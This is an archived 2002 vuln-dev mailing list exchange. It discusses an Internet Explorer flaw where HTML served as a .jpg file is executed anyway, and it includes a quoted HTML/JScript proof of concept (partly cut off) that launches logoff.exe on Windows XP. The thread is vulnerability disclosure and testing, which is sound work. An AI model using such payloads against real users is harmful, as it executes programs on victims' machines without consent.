Re: Rather large MSIE-hole

From: Jon Zobrist (kgb@ussr.com)
Date: 03/12/02

Previous message: George Datuashvili: "Microsoft _snprintf stack overflow (note n)"
In reply to: Magnus Bodin: "Rather large MSIE-hole"
Next in thread: foo BAR: "Re: Rather large MSIE-hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Jon Zobrist" <kgb@ussr.com>
To: "Magnus Bodin" <magnus@bodin.org>, <vuln-dev@securityfocus.com>
Date: Tue, 12 Mar 2002 12:50:04 -0700

I copied the included text, pasted it into bad.jpg on my apache box, called
the page from my IE and got the message
You should feel lucky if you dont have XP right now.

I'm running Windows XP Pro, IE Version 6.0.2600.0000.xpclient.010817-1148

Installed patches/hotfixes:
Windows XP Application Compatibality Update[Q313484]
Windows XP Hotfixes for Q307869, Q308210, Q309521, Q309691, Q310437,
Q311889, Q314147, Q3150000

-Jon Zobrist, CISSP

----- Original Message -----
From: "Magnus Bodin" <magnus@bodin.org>
To: <vuln-dev@securityfocus.com>
Sent: Tuesday, March 12, 2002 3:32 AM
Subject: Rather large MSIE-hole

>
> The latest MSIE-hole is now spreading.
>
> THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
> Content-Type if it "thinks" it knows better, then the code is executed.
> This in combination with the malicious code that is possible to run, then
> an "innocent.jpg" with the following content will log off an XP-user.
>
> --%< cut here-----
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> <HTML>
> <HEAD>
> <TITLE>IE6 security...</TITLE>
>
> <META http-equiv=Content-Type content="text/html; charset=windows-1252">
> <SCRIPT language=JScript>
>
> var programName=new Array(
> 'c:/windows/system32/logoff.exe',
> 'c:/winxp/system32/logoff.exe',
> 'c:/winnt/system32/logoff.exe'
> );
>
> function Init(){
> var oPopup=window.createPopup();
> var oPopBody=oPopup.document.body;
> var n,html='';
> for(n=0;n<programName.length;n++)
> html+="<OBJECT NAME='X'
> CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
> oPopBody.innerHTML=html;
> oPopup.show(290, 390, 200, 200, document.body);
> }
>
> </SCRIPT>
> </head>
> <BODY onload="Init()">
> You should feel lucky if you dont have XP right now.
> </BODY>
> </HTML>
> --%< cut here-----
>
>
> --
> magnus MICROS~1 BOB was written in Lisp.
> http://x42.com/
>

Previous message: George Datuashvili: "Microsoft _snprintf stack overflow (note n)"
In reply to: Magnus Bodin: "Rather large MSIE-hole"
Next in thread: foo BAR: "Re: Rather large MSIE-hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: Vendors that suck
... server but a kit of parts for a server, which if you are lucky will ... assemble into a working whole, but you are not always lucky. ... I'm dealing with are not a VAR, they're a retailer, and I shall continue to ...
(alt.sysadmin.recovery)
Re: Problem drawing line on plot
... > Gerry Tondo: ... > <SNIP not lucky with var names... ...
(comp.soft-sys.matlab)
Re: Equation editor
... If you're lucky, SW will notice the name change and ask if you want it to ... update references. ... but it might be worth pestering the VAR just ...
(comp.cad.solidworks)
Re: Problem drawing line on plot
... <SNIP not lucky with var names... ...
(comp.soft-sys.matlab)